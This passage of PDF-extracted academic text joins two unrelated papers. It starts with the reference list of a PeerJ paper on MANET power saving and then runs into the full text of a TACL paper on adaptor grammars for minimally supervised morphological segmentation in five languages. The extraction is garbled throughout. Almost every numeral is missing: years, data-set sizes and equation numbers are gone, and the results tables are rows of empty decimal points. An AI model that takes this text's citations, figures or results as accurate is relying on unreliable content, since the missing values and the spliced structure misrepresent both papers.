us enough resources for carrying out our work. additional information and declarations funding the authors received no funding for this work. fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. competing interests the authors declare there are no competing interests. 
author contributions • lubna naaz fatima conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, testing. • syeda hajra mahin analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, drafting. • fahmina taranum conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, idea. data availability the following information was supplied regarding data availability: raw data and code are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references anuj kg, sadawarti h, anil kv. . implementation of dymo routing protocol. in- ternational journal of information technology, modeling and computing ( ): – . bhatt ur, jain p, upadhyay r. . an enhanced aodv- energy efficient routing protocol for manet. in: nirma university international conference on engineering (nuicone). chen x, xie y, wang c. . implementation and analysis of ieee psm in ns- . in: international conference on machine learning and cybernetics. guilin. comlab. . available at http://www.comlab.hut.fi/studies/ /luentokalvot/ _ wlan .pdf . didawiki. . available at http://didawiki.cli.di.unipi.it/lib/exe/fetch.php/rhs/slides- _dymo_n_ .pdf . fatima ln, mahin sh, taranum f. . power management strategies in manets— a review. international journal of recent technology and engineering (ijrte) ( s): – . jain a. . reduction of power consumption at mobile station in multi-hop networks in mobile environments. in: international conference on emerging technology trends in electronics, communication, and networking. kandari s, pandey mk. . evaluation of energy consumption by nodes of manet. in: national conference on recent advances in electronics & computer engineering, lit roorkee india. fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://www.comlab.hut.fi/studies/ /luentokalvot/ _wlan .pdf http://www.comlab.hut.fi/studies/ /luentokalvot/ _wlan .pdf http://didawiki.cli.di.unipi.it/lib/exe/fetch.php/rhs/slides- _dymo_n_ .pdf http://didawiki.cli.di.unipi.it/lib/exe/fetch.php/rhs/slides- _dymo_n_ .pdf http://dx.doi.org/ . /peerj-cs. moustafa ay, vasan a, raymond em. . specification and analysis of the dcf and pcf protocols in the standard using systems of communicating machines. in: ieee. paris, france. nand p, astya r, ali aw. . performance analysis and impact of different mobility model on the specific configured network with ieee for wsns. in: interna- tional conference on computing communication and automation (iccca). sangwan y, pooja . . a survey on battery conservation approaches in manet. international journal of scientific & engineering research ( ): – . saranya as, ravi g. . a review on power saving techniques in manet. interna- tional journal of scientific and research publications ( ): – . swain p, chakraborty s, nandi s, bhaduri p. . 
performance modeling and evaluation of ieee ibss power save mode. in: elsevier. guwahati, india. taranum f, khaleel ur rk, muhammed a. . in: singh pk, ed. power consumption analysis in multi-hop networks of mobile environments. singapore: springer, – . thontadharya hj, shwetha d, bhat ms, devaraju jt. . effect of idle mode on power savingin mobile wimax network. in: springer. new delhi. tripathy s. . study and analysis of performance of ieee . power saving mode. department of computer science and engineering national institute of technology, rourkela. further reading dd.wrt.com. . available at https://wiki.dd-wrt.com/wiki/index.php/advanced_ wireless_settings. ionos. . available at https://www.ionos.com/digitalguide/server/know-how/csmaca- carrier-sense-multiple-access-with-collision-avoidance/ . kim b, park j, choi y-h. . power saving mechanisms of ieee e: sleep mode vs. idle mode. in: international symposium on parallel and distributed processing and applications(ispa). bisa research grant of keimyung university and the research grant of kwangwoon university. rajgor m, shete p, awale rn. . probabilistic energy efficient routing protocol for wireless sensor network. in: international conference on communication information & computing technology (iccic). tanejaa s, kushb a, makkarc a, bhushand b. . power management in mobile adhoc network. international transaction journal of engineering, management, & applied sciences & technologies ( ): . fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://wiki.dd-wrt.com/wiki/index.php/advanced_wireless_settings https://wiki.dd-wrt.com/wiki/index.php/advanced_wireless_settings https://www.ionos.com/digitalguide/server/know-how/csmaca-carrier-sense-multiple-access-with-collision-avoidance/ https://www.ionos.com/digitalguide/server/know-how/csmaca-carrier-sense-multiple-access-with-collision-avoidance/ http://dx.doi.org/ . /peerj-cs. edinburgh research explorer minimally-supervised morphological segmentation using adaptor grammars citation for published version: sirts, k & goldwater, s , 'minimally-supervised morphological segmentation using adaptor grammars', transactions of the association for computational linguistics, vol. , no. may, pp. - . <http://aclweb.org/anthology//q/q /q - .pdf> link: link to publication record in edinburgh research explorer document version: publisher's pdf, also known as version of record published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. http://aclweb.org/anthology//q/q /q - .pdf https://www.research.ed.ac.uk/portal/en/publications/minimallysupervised-morphological-segmentation-using-adaptor-grammars(e fc - a - - b - e e b).html transactions of the association for computational linguistics, ( ) – . action editor: kristina toutanova. submitted / ; published / . 
c© association for computational linguistics. minimally-supervised morphological segmentation using adaptor grammars kairit sirts institute of cybernetics tallinn university of technology sirts@phon.ioc.ee sharon goldwater school of informatics the university of edinburgh sgwater@inf.ed.ac.uk abstract this paper explores the use of adaptor gram- mars, a nonparametric bayesian modelling framework, for minimally supervised morpho- logical segmentation. we compare three train- ing methods: unsupervised training, semi- supervised training, and a novel model selec- tion method. in the model selection method, we train unsupervised adaptor grammars us- ing an over-articulated metagrammar, then use a small labelled data set to select which poten- tial morph boundaries identified by the meta- grammar should be returned in the final output. we evaluate on five languages and show that semi-supervised training provides a boost over unsupervised training, while the model selec- tion method yields the best average results over all languages and is competitive with state-of- the-art semi-supervised systems. moreover, this method provides the potential to tune per- formance according to different evaluation met- rics or downstream tasks. introduction research into unsupervised learning of morphology has a long history, starting with the work of harris ( ). while early research was mostly motivated by linguistic interests, more recent work in nlp often aims to reduce data sparsity in morphologically rich languages for tasks such as automatic speech recogni- tion, statistical machine translation, or automatic text generation. for these applications, however, com- pletely unsupervised systems may not be ideal if even a small amount of segmented training data is available. in this paper, we explore the use of adap- tor grammars (johnson et al., ) for minimally supervised morphological segmentation. adaptor grammars (ags) are a nonparametric bayesian modelling framework that can learn latent tree structures over an input corpus of strings. for example, they can be used to define a morpholog- ical grammar where each word consists of zero or more prefixes, a stem, and zero or more suffixes; the actual forms of these morphs (and the segmentation of words into morphs) are learned from the data. in this general approach ags are similar to many other unsupervised morphological segmentation systems, such as linguistica (goldsmith, ) and the mor- fessor family (creutz and lagus, ). a major difference, however, is that the morphological gram- mar is specified as an input to the program, rather than hard-coded, which allows different grammars to be explored easily. for the task of segmenting utterances into words, for example, johnson and col- leagues have experimented with grammars encoding different kinds of sub-word and super-word structure (e.g., syllables and collocations), showing that the best grammars far outperform other systems on the same corpora (johnson, a; johnson and goldwa- ter, ; johnson and demuth, ). these word segmentation papers demonstrated both the power of the ag approach and the syner- gistic behavior that occurs when learning multiple levels of structure simultaneously. however, the best- performing grammars were selected using the same corpus that was used for final testing, and each paper dealt with only one language. 
the ideal unsuper- vised learner would use a single grammar tuned on one or more development languages and still perform well on other languages where development data is unavailable. indeed, this is the basic principle be- hind linguistica and morfessor. however, we know that different languages can have very different mor- phological properties, so using a single grammar for all languages may not be the best approach if there is a principled way to choose between grammars. though ags make it easy to try many different pos- sible grammars, the process of proposing and testing plausible options can still be time-consuming. in this paper, we propose a novel method for au- tomatically selecting good morphological grammars for different languages (english, finnish, turkish, german, and estonian) using a small amount of gold-segmented data ( word types). we use the ag framework to specify a very general binary- branching grammar of depth four with which we learn a parse tree of each word that contains several possible segmentation splits for the word. then, we use the gold-segmented data to learn, for each lan- guage, which of the proposed splits from the original grammar should actually be used in order to best segment that language. we evaluate our approach on both a small devel- opment set and the full morpho challenge test set for each language—up to three million word types. in doing so, we demonstrate that using the posterior grammar of an ag model to decode unseen data is a feasible way to scale these models to large data sets. we compare to several baselines which use the annotated data to different degrees: parameter tuning, grammar tuning, supervised training, or no use of annotated data. in addition to existing approaches— unsupervised and semi-supervised morfessor, unsu- pervised morsel (lignos, ), and unsupervised ags—we also show how to use the annotated data to train semi-supervised ags (using the data to accumu- late rule statistics rather than for grammar selection). the grammar selection method yields comparable results to the best of these other approaches. to summarize, our contributions in this paper are: ) scaling ags to large data sets by using the poste- rior grammar to define an inductive model; ) demon- strating how to train semi-supervised ag models, and showing that this improves morphological segmenta- tion over unsupervised training; and ) introducing a novel grammar selection method for ag models whose segmentation results are competitive with the best existing systems. before providing details of our methods and re- sults, we first briefly review adaptor grammars. for a formal definition, see johnson et al. ( ). adaptor grammars adaptor grammars are a framework for specifying nonparametric bayesian models that can be used to learn latent tree structures from a corpus of strings. there are two components to an ag model: the base distribution, which is just a pcfg, and the adaptor, which “adapts” the probabilities assigned to individ- ual subtrees under the pcfg model, such that the probability of a subtree under the complete model may be considerably higher than the product of the probabilities of the pcfg rules required to construct it. although in principle the adaptor can be any func- tion that maps one distribution onto another, johnson et al. ( ) use a pitman-yor process (pyp) (pit- man and yor, ) as the adaptor because it acts as a caching model. 
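A minimal sketch of the caching behaviour just described: under a Pitman-Yor adaptor, the probability of generating a particular subtree mixes its cached counts with its probability under the base PCFG, so frequently reused subtrees receive far more mass than the PCFG alone would give them. The discount, concentration, and count values below are illustrative placeholders, not settings or statistics from the paper.

def pyp_subtree_prob(customers, tables, total_customers, total_tables,
                     base_pcfg_prob, discount=0.5, concentration=1.0):
    # Predictive probability of a subtree under a Pitman-Yor adaptor:
    # `customers`/`tables` are the cache counts for this subtree,
    # `total_customers`/`total_tables` are the totals for the adapted
    # non-terminal, and `base_pcfg_prob` is the subtree's probability
    # under the base PCFG distribution.
    denom = total_customers + concentration
    reuse = max(customers - discount * tables, 0.0) / denom
    new = (concentration + discount * total_tables) / denom * base_pcfg_prob
    return reuse + new

# A frequently cached subtree (e.g. a common suffix) vs. an unseen one, with
# made-up counts: the cached subtree dominates its tiny PCFG probability.
print(pyp_subtree_prob(customers=50, tables=3, total_customers=1000,
                       total_tables=200, base_pcfg_prob=1e-6))
print(pyp_subtree_prob(customers=0, tables=0, total_customers=1000,
                       total_tables=200, base_pcfg_prob=1e-6))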
under a pyp ag model, the posterior probability of a particular subtree will be roughly proportional to the number of times that sub- tree occurs in the current analysis of the data (with the probability of unseen subtrees being computed under the base pcfg distribution). an ag model can be defined by specifying the cfg rules (the support for the base distribution) and indicating which non-terminals are “adapted”, i.e., can serve as the root of a cached subtree. given this definition and an input corpus of strings, markov chain monte carlo samplers can be used to infer the posterior distribution over trees (and all hyperparam- eters of the model, including pcfg probabilities in the base distribution and pyp hyperparameters). any frequently recurring substring (e.g., a common pre- fix) will tend to be parsed consistently, as this permits the model to treat the subtree spanning that string as a cached subtree, assigning it higher probability than under the pcfg distribution. adaptor grammars have been applied to a wide variety of tasks, including segmenting utterances into words (johnson, a; johnson and goldwa- ter, ; johnson and demuth, ), classifying documents according to perspective (hardisty et al., ), machine transliteration of names (huang et al., ), native language identification (wong et al., ), and named entity clustering (elsner et al., ). there have also been ag experiments with morphological segmentation, but more as a proof of concept than an attempt to achieve state-of-the-art results (johnson et al., ; johnson, b). using ags for learning morphology originally, the ag framework was designed for un- supervised learning. this section first describes how ags can be used for unsupervised morphological segmentation, and then introduces two ways to use a small labelled data set to improve performance: semi-supervised learning and grammar selection. . unsupervised adaptor grammars we define three ag models to use as unsupervised baselines in our segmentation experiments. the first of these is very simple: word → morph+ morph → char+ ( ) the underline notation indicates an adapted non- terminal, and + abbreviates a set of recursive rules, e.g., word → morph+ is short for word → morphs morphs → morph morphs morphs → morph grammar (morphseq) is just a unigram model over morphs: the morph symbol is adapted, so the probability of each morph will be roughly propor- tional to its (inferred) frequency in the corpus. the grammar specifies no further structural relationships between morphs or inside of morphs (other than a geometric distribution on their length in characters). experiments with ags for unsupervised word seg- mentation suggest that adding further latent structure can help with learning. here, we add another layer of structure below the morphs, calling the resulting because the nonterminal labels are arbitrary, this grammar can also be interpreted as adding another layer on top of morphs, allowing the model to learn morph collocations that encode de- pendencies between morphs (which themselves have no substruc- ture). however preliminary experiments showed that the morph- submorph interpretation scored better than the collocation-morph interpretation, hence we chose the corresponding nonterminal names. grammar submorphs: word → morph+ morph → submorph+ submorph → char+ ( ) for capturing the rules of morphotactics, a gram- mar with linguistically motivated non-terminals can be created. 
There are many plausible options and the best-performing grammar may be somewhat language-dependent. Rather than experimenting extensively, we designed our third grammar to replicate as closely as possible the grammar that is implicitly implemented in the Morfessor system. This compounding grammar distinguishes between prefixes, stems and suffixes, allows compounding, defines the order in which the morphs can occur, and also allows the morphs to have inner latent structure:

Word → Compound+
Compound → Prefix* Stem Suffix*
Prefix → SubMorph+
Stem → SubMorph+
Suffix → SubMorph+
SubMorph → Char+        (3)

Semi-supervised adaptor grammars

The first new use of AGs we introduce is the semi-supervised AG, where we use the labelled data to extract counts of the different rules and subtrees used in the gold-standard analyses. We then run the MCMC sampler as usual over both the unlabelled and labelled data, treating the counts from the labelled data as fixed.

We assume that the labelled data provides a consistent bracketing (no two spans in the bracketing can partially overlap) and that the labels of the spans are compatible with the grammar. However, the bracketing may not specify all levels of structure in the grammar. In our case, we have morpheme bracketings but not, e.g., submorphs. Thus, using the SubMorphs grammar in semi-supervised mode will constrain the sampler so that morph spans in the labelled data remain fixed, while the submorphs inside those morphs are resampled. The main change made to the AG inference process for implementing the semi-supervised AG was to prune out from the sampling distribution any non-terminals that are inconsistent with the spans/labels in the given labelling.

AG Select

Both the unsupervised and semi-supervised methods described above assume the definition of a grammar that adequately captures the phenomena being modelled. Although the AG framework makes it easy to experiment with different grammars, these experiments can be time-consuming and require some good guesses as to what a plausible grammar might be. These problems can be overcome by automating the grammar development process to systematically evaluate different grammars and find the best one.

We propose a minimally supervised model selection method, AG Select, that uses the AG framework to automatically identify the best grammar for different languages and data sets. We first define a very general binary-branching CFG grammar for AG training that we call the metagrammar. The metagrammar learns a parse tree for each word where each branch contains a different structure in the word. The granularity of these structures is determined by the depth of this tree. For example, grammar (4) generates binary trees of depth two and can learn segmentations of up to four segments.

Word → M1
Word → M1 M2
M1 → M11
M1 → M11 M12
M2 → M21
M2 → M21 M22
M11 → Chars+
M12 → Chars+
M21 → Chars+
M22 → Chars+        (4)

Next we introduce the notion of a morphological template, which is an ordered sequence of non-terminals whose concatenated yields constitute the word and which are used to parse out a specific segmentation of the word. For example, using grammar (4), the parse tree of the word saltiness is shown in the figure below. (We started with Mark Johnson's PYAG implementation, http://web.science.mq.edu.au/~mjohnson/code/py-cfg.tgz, which we also used for our unsupervised and grammar selection experiments.) There are four possible templates with four
different segmentations: M1 M2 (salt iness), M11 M12 M2 (sal t iness), M1 M21 M22 (salt i ness), and M11 M12 M21 M22 (sal t i ness).

Figure: the parse tree generated by the depth-two metagrammar for the word saltiness, i.e. (Word (M1 (M11 s a l) (M12 t)) (M2 (M21 i) (M22 n e s s))).

The morphological template consisting only of non-terminals from the lowest cached level of the parse tree is expected to have high recall, whereas the template containing the non-terminals just below the word is expected to have high precision. Our goal is to find the optimal template by using a small labelled data set. The grammar selection process iterates over the set of all templates. For each template, the segmentations of the words in the labelled data set are parsed out and the value of the desired evaluation metric is computed. The template that obtained the highest score is then chosen.

For each language we use a single template to segment all the words in that language. However, even using (say) a four-morph template such as M11 M12 M21 M22, some words may contain fewer morphs, because the metagrammar permits either unary or binary branching rules, so some parses may not contain all of the template's spans (a parse that uses the unary Word → M1 rule, for instance, has no M2 span and hence no M21 or M22 spans). Thus, we can represent segmentations of different lengths, from a single segment up to the maximum the metagrammar's depth allows, with a single template.

For our experiments we use a metagrammar of depth four. This grammar allows words to consist of up to 16 segments, which we felt would be enough for any word in the training data. Also, iterating over all the templates of a grammar with bigger depth would not be feasible, as the number of different templates increases very rapidly. (The number of templates of each depth can be expressed recursively as n_i = (n_{i-1} + 1)^2, where n_{i-1} is the number of templates in the grammar of depth one less and n_1 = 1.) We also experimented with selecting different templates for words of different length, but observed no improvements over the single-template approach.

Inductive learning

Previous work on AGs has used relatively small data sets and run the sampler on the entire input corpus (some or all of which is also used for evaluation), a transductive learning scenario. However, our larger data sets contain millions of word types, where sampling over the whole set is not feasible; for example, a full training run of the sampler took about a week on a single CPU even on a reduced word list. To solve this problem, we need an inductive learner that can be trained on a small set of data and then used to segment a different, larger set. To create such a learner, we run the sampler on a smaller subset of the word types and then extract the posterior grammar as a PCFG. This grammar contains all the initial CFG rules, plus rules to generate each of the cached subtrees inferred by the sampler. The sampler counts of all rules are normalized to obtain a PCFG, and we can then use a standard CKY parser to decode the remaining data using this PCFG.

Experiments

Data. We test on five languages with a range of morphological complexity: English, Finnish, Turkish, German, and Estonian. For each language we use two small sets of gold-annotated data (a labelled set for semi-supervised training or model selection and a dev set for development results) and one larger gold-annotated dataset for final tests. We also have a large unlabelled training set for each language; the accompanying table gives the word-type counts. The data sets for English, Finnish, Turkish and German are from the Morpho Challenge competition (MC).
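Returning to the template selection described above, the sketch below enumerates the templates of a depth-d metagrammar of this binary-branching form (each node is either kept whole or replaced by its two children) and reproduces the count recursion n_i = (n_{i-1} + 1)^2, giving 1, 4, 25 and 676 templates for depths one to four. The node naming follows the M1/M11/M12 convention used here; this is only an illustration, not the selection procedure's actual implementation.

def node_templates(node, depth, level=1):
    # Templates rooted at `node`: either use the node as one segment, or
    # (if not yet at the maximum depth) split it into its two children.
    if level == depth:
        return [[node]]
    left = node_templates(node + "1", depth, level + 1)
    right = node_templates(node + "2", depth, level + 1)
    return [[node]] + [l + r for l in left for r in right]

def word_templates(depth):
    # A template is an ordered sequence of non-terminals whose yields,
    # concatenated, cover the whole word (M2-side spans may be empty for
    # words parsed with the unary Word -> M1 rule).
    left = node_templates("M1", depth)
    right = node_templates("M2", depth)
    return [l + r for l in left for r in right]

print(word_templates(2))                               # the four templates listed above
print([len(word_templates(d)) for d in (1, 2, 3, 4)])  # [1, 4, 25, 676]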
we use the mc training set of annotated word types as our labelled data, and for our dev sets we collate together the devel- opment data from all years of the mc competition. final evaluation is done on the official mc test sets, which are not public, so we rely on the mc organizers to perform the evaluation. the words in templates in the grammar of depth one less and n = . this can be seen as a form of structure compilation (liang et al., ), where the solution found by a more costly model is used to define a less costly model. however in liang et al.’s case both models were already inductive. http://research.ics.aalto.fi/events/morphochallenge / datasets.shtml unlab. lab. dev test english . m k finnish . m k turkish . m k german . m k estonian . m k table : number of word types in our data sets. each test set are an unknown subset of the words in the unlabelled corpus, so to evaluate we segmented the entire unlabelled corpus and sent the results to the mc team, who then computed scores on the test words. the estonian wordlist is gathered from the news- paper texts of a mixed corpus of estonian. gold standard segmentations of some of these words are available from the estonian morphologically disam- biguated corpus; we used these for the test set, with small subsets selected randomly for the labelled and dev sets. for semi-supervised tests of the ag compounding grammar we annotated the morphemes in the english, finnish and estonian labelled sets as prefixes, stems or suffixes. we could not do so for turkish because none of the authors knows turkish. . evaluation we evaluate our results with two measures: segment border f -score (sbf ) and emma (spiegler and monson, ). sbf is one of the simplest and most popular evaluation metrics for morphological segmentations. it computes f -score from the preci- sion and recall of ambiguous segment boundaries— i.e., word edges are not counted. it is easy and quick to compute but has the drawback that it gives no credit for one-morpheme words that have been seg- mented correctly (i.e., are assigned no segment bor- ders). also it can only be used on systems and gold standards where the output is just a segmentation of the surface string (e.g., availabil+ity) rather than a morpheme analysis (e.g., available+ity). for this reason we cannot report sbf on our german data, which annotations contain only analyses. emma is a newer measure that addresses both http://www.cl.ut.ee/korpused/segakorpus/epl http://www.cl.ut.ee/korpused/morfkorpus/ of these issues—correctly segmented one-morpheme words are reflected in the score, and it can evalu- ate both concatenative and non-concatenative mor- phology. emma works by finding the best one-to- one mapping between the hypothesized and true seg- ments. the induced segments are then replaced with their mappings and based on that, f -score on match- ing segments is calculated. using emma we can evaluate the induced segmentations of german words against gold standard analyses. emma has a freely available implementation, but is slow to compute because it uses integer linear programming. for our dev results, we computed both scores us- ing the entire dev set, but for the large test sets, the evaluation is done on batches of word types se- lected randomly from the test set. this procedure is repeated times and the average is reported, just as in the mc competition (kohonen et al., a). . baseline models we compare our ag models to several other mor- phology learning systems. 
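The segment border F-score described in the evaluation section above only scores internal boundary positions (word edges are ignored, and correctly unsegmented words contribute nothing), so it can be sketched in a few lines. This is an illustration of the measure, not the official Morpho Challenge scoring script; the example words are placeholders.

def boundaries(morphs):
    # Internal split positions of a word, e.g. ["avail", "abil", "ity"] -> {5, 9};
    # word edges are not counted.
    cuts, pos = set(), 0
    for morph in morphs[:-1]:
        pos += len(morph)
        cuts.add(pos)
    return cuts

def segment_border_f1(gold, predicted):
    # gold / predicted: one segmentation per word, each a list of surface morphs.
    tp = fp = fn = 0
    for g, p in zip(gold, predicted):
        gb, pb = boundaries(g), boundaries(p)
        tp += len(gb & pb)
        fp += len(pb - gb)
        fn += len(gb - pb)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    if precision + recall == 0.0:
        return 0.0
    return 2 * precision * recall / (precision + recall)

gold = [["avail", "abil", "ity"], ["salt", "i", "ness"]]
pred = [["availabil", "ity"], ["salt", "iness"]]
print(round(segment_border_f1(gold, pred), 3))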
we were able to obtain implementations of two of the best unsupervised sys- tems from mc , morfessor (creutz and lagus, ) and morsel (lignos, ), and we use these for comparisons on both the dev and test sets. we also report test results from mc for the only semi-supervised system in the competition, semi- supervised morfessor (kohonen et al., a; ko- honen et al., b). no dev results are reported on this system since we were unable to obtain an imple- mentation. this section briefly reviews the systems. . . morfessor categories-map morfessor categories-map (morfessor) is a state- of-the-art unsupervised morphology learning system. its implementation is freely available so it is widely used both as a preprocessing step in tasks requiring morphological segmentations, and as a baseline for evaluating morphology learning systems. morfessor uses the minimum description length (mdl) principle to choose the optimal segment lexi- con and the corpus segmentation. each morph in the segment lexicon is labelled as a stem, prefix, suffix http://www.cs.bris.ac.uk/research/machinelearning/ morphology/resources.jsp#eval http://www.cis.hut.fi/projects/morpho/ morfessorcatmapdownloadform.shtml or non-morph. the morphotactic rules are encoded as an hmm, which specifies the allowed morph se- quences with respect to the labels (e.g., a suffix can- not directly follow a prefix). the morphs in the segment lexicon can have a hierachical structure, containing submorphs which themselves can consist of submorphs etc. we hypoth- esize that this hierarchical structure is one of the key reasons why morfessor has been so successful, as the experiments also in this paper with different gram- mars show that the ability to learn latent structures is crucial for learning good segmentations. one essential difference between morfessor and the proposed ag select is that while we use the la- belled data to choose which levels of the hierarchy are to be used as morphs, morfessor makes this de- cision based on the labels of the segments, choosing the most fine-grained morph sequence that does not contain the non-morph label. morfessor includes a free parameter, perplexity threshold, which we found can affect the sbf score considerably ( points or more). the best value for this parameter depends on the size of the training set, characteristics of the language being learned, and also the evaluation metric being used, as in some cases the best sbf and emma scores are obtained with completely different values. thus, we tuned the value of the perplexity thresh- old on the labelled set for each language and evalua- tion metric for different unlabelled training set sizes. . . semi-supervised morfessor recently, the morfessor system has been adapted to allow semi-supervised training. four versions of the system were evaluated in mc , using differ- ent degrees of supervision. results reported here are from the morfessor s+w system, which performed best of those that use the same kind of labelled data as we do. this system uses the morfessor base- line model (not cat-map), which incorporates a lexicon prior and data likelihood term. the semi- supervised version maintains separate likelihoods for the labelled and unlabelled data, and uses the devel- opment set to tune two parameters that weight these terms with respect to each other and the prior. morfessor s+w+l performs better, but uses training data with morpheme analyses rather than surface segmentations. . . 
morsel morsel (lignos, ) is an unsupervised mor- phology learning system introduced in mc ; we obtained the implementation from the author. morsel learns morphological analyses rather than segmenta- tions, so it can be evaluated only using emma. there are two options provided for running morsel: aggres- sive and conservative. we used the development set to choose the best in each experimental case. the mc data sets contain gold standard morpho- logical analyses (as well as segmentations) so we could compute morsel’s emma scores using the analyses. however, we found that morsel obtains higher emma scores when evaluated against gold standard segmentations and thus we used this option in all the experiments. (emma scores for other sys- tems were also computed using the segmentations.) . method the experiments were conducted in two parts. first, we evaluated different aspects of the ag models and compared to all baseline models using the dev set data. then we evaluated the most competitive models on the final test data. for the development experiments, we compiled un- labelled training sets with sizes ranging from k to k word types (using the most frequent word types in each case). for the ag results, we report the aver- age of five different runs made on the same training set. we let the sampler run for iterations. no annealing was used as it did not seem to help. the table label resampling option was turned on and the hyperparameter values were inferred. we trained all ag and baseline models on each of these training sets. for ag select, the words from the labelled data set were added to the training set to allow for template selection. to compute results in transductive mode, the words from the dev set were also added to the training data. in inductive mode, the dev set was instead parsed with the cky parser. preliminary experiments showed that the perfor- mance of unsupervised ag and ag select improved with larger training sets, though the effect is small (see figure for results of ag select in transductive we also experimented with smaller sets of labelled data. in most cases, the template selected based on only word types was the same than the one selected with word types. mode; the trend in inductive mode is similar). based on these and similar results with other baseline sys- tems, all results reported later for unsupervised mod- els (ag and baseline) and ag select were obtained using training sets of k words. in contrast to the above models, the semi- supervised ag does not always improve with more unlabelled data (see figure ) and in the limit, it will match the performance of the same grammar in the unsupervised setting. other semi-supervised approaches often solve this problem by weighting the labelled data more heavily than the unlabelled data when estimating model parameters—effectively, assuming that each labelled item has actually been observed more than once. however, duplicating the labelled data does not make sense in the ag frame- work, because duplicate items will in most cases just be cached at the root (word) node, providing no addi- tional counts of morphs (which are where the useful information is). it might be possible to come up with a different way to weight the labelled data more heav- ily when larger unlabelled sets are used, however for this paper we instead kept the labelled data the same and tuned the amount of unlabelled data. 
we used the dev set to choose the amount of unlabelled data (in the range from k to k types); results for semi-supervised ag are reported using the optimal amount of unlabelled data for each experiment. for test set experiments with semi-supervised ag, we evaluated each language using whichever gram- mar performed best on that language’s dev set. for test set experiments with ag select, we chose the templates with a two-pass procedure. first, we trained samplers on the k training set with la- belled set added, and used the labelled data to choose the best template for each inferred grammar. then, we decoded the dev set using each of the gram- mar/template pairs and based on these results, chose the best of these pairs to decode the test set. . results we present the dev set results in table (a) for trans- ductive and in table (b) for inductive learning. in each table, unsupervised models are shown in the upper section and the semi-supervised models and ag select below. morsel appears only in table (a) since it only works transductively. semi-supervised grammars cannot be trained on german, since we f -s c o re # of word types english estonian finnish turkish f -s c o re # of word types english estonian finnish turkish figure : effect of training data size on dev set sbf for ag select (left) and semi-supervised submorphs grammar (right) in transductive mode. only have gold standard analyses, not segmentations. the submorphs grammar performs the best of the unsupervised ag models, with the compounding grammar being only slightly worse. we also tried the compounding grammar without the sub-morph structures but the results were even worse than those of morphseq. this shows that the latent structures are important for learning good segmentations. in all cases, the semi-supervised ags perform bet- ter (ofen much better) than the corresponding unsu- pervised grammars. even though their average scores are not as high as ag select’s, they give the best dev set results in many cases. this shows that although for semi-supervised ag the grammar must be cho- sen manually, with a suitable choice of the grammar and only a small set of labelled data it can improve considerably over unsupervised ag. in transductive mode, the ag select performs the best in several cases. in both transductive and induc- tive mode, the results of ag select are close to the best results obtained and are consistently good across all languages—it achieves the best average scores of all models, suggesting that the model selection method is robust to different types of morphology and annotation schemes. table presents the test set results. we include scores for unsupervised morfessor in both transduc- tive and inductive mode, where transductive mode trains on the entire unlabelled corpus and inductive mode trains on the k subset. the semi-supervised morfessor scores are taken from the mc results page after verifying that the evaluation method- http://research.ics.aalto.fi/events/morphochallenge/ ology and labelled data used is the same as ours. there is a good deal of variation between devel- opment and test results, indicating that the dev sets may not be a representative sample. the most no- table differences are in turkish, where all models perform far worse on the test than dev set. however, ag select performs slightly better on the test set for the other languages. thus its average sbf score ac- tually improves on the test set and is not much worse than semi-supervised morfessor. 
while its average performance drops somewhat on test set emma, it is still as good as any other model on that measure. again, these results support the idea that ag select is robust to variations in language and data set. we also note the surprisingly good performance of morfessor in transductive mode on estonian; this could possibly be due to the larger amount of training data used for the test set results, but it is not clear why this would improve performance so much on estonian and not on the other languages. discussion to give a sense of what the ag select model is learn- ing, we provide some examples of both correctly and incorrectly induced segmentations in table . these examples suggest that for example in english, m is used to model the stem, m is for the suffix or the second stem in the compound word, and the rest of the elements in the template are for the remaining suffixes (if any). table presents examples of some of the most frequently used metagrammar rules and cached rules sami virpioja, personal communication. (a) transductive mode border f -score emma eng est fin tur avg eng est fin tur ger avg ag morphseq . . . . . . . . . . . ag submorphs . . . . . . . . . . . ag compounding . . . . . . . . . . . morfessor . . . . . . . . . . . morsel - - - - - . . . . . . ag ssv morphseq . . . . . . . . . - - ag ssv submorphs . . . . . . . . . - - ag ssv compounding . . . - - . . . - - - ag select . . . . . . . . . . . (b) inductive mode border f -score emma eng est fin tur avg eng est fin tur ger avg ag morphseq . . . . . . . . . . . ag submorphs . . . . . . . . . . . ag compounding . . . . . . . . . . . morfessor . . . . . . . . . . . ag ssv morphseq . . . . . . . . . - - ag ssv submorphs . . . . . . . . . - - ag ssv compounding . . . - - . . . - - - ag select . . . . . . . . . . . table : dev set results for all models in (a) transductive and (b) inductive mode. unsupervised ag models and baselines are shown in the top part of each table; semi-supervised ag models and grammar selection method are below. border f -score emma eng est fin tur avg -est eng est fin tur ger avg -est/ger morf. trans . . . . . . . . . . . . . morf. ind . . . . . . . . . . . . . morsel - - - - - - . . . . . . . morf. ssv . - . . - . . - . . - - . ag ssv best . ? . † . ? . ∗ . . . ? . † . ? . ∗ - - . ag select . . . . . . . . . . . . . table : test set results for unsupervised baselines morfessor catmap (in transductive and inductive mode) and morsel; semi-supervised morfessor; and ag semi-supervised (? marks the compounding grammar, † denotes submorphs grammar, and ∗ is the morphseq grammar) and grammar selection methods. results are shown for each language, averaged over all languages (when possible: avg), and averaged over just the languages where scores are available for all systems (-est, -est/ger). for english, together with their relative frequencies. it shows that at the word level the binary rule is selected over 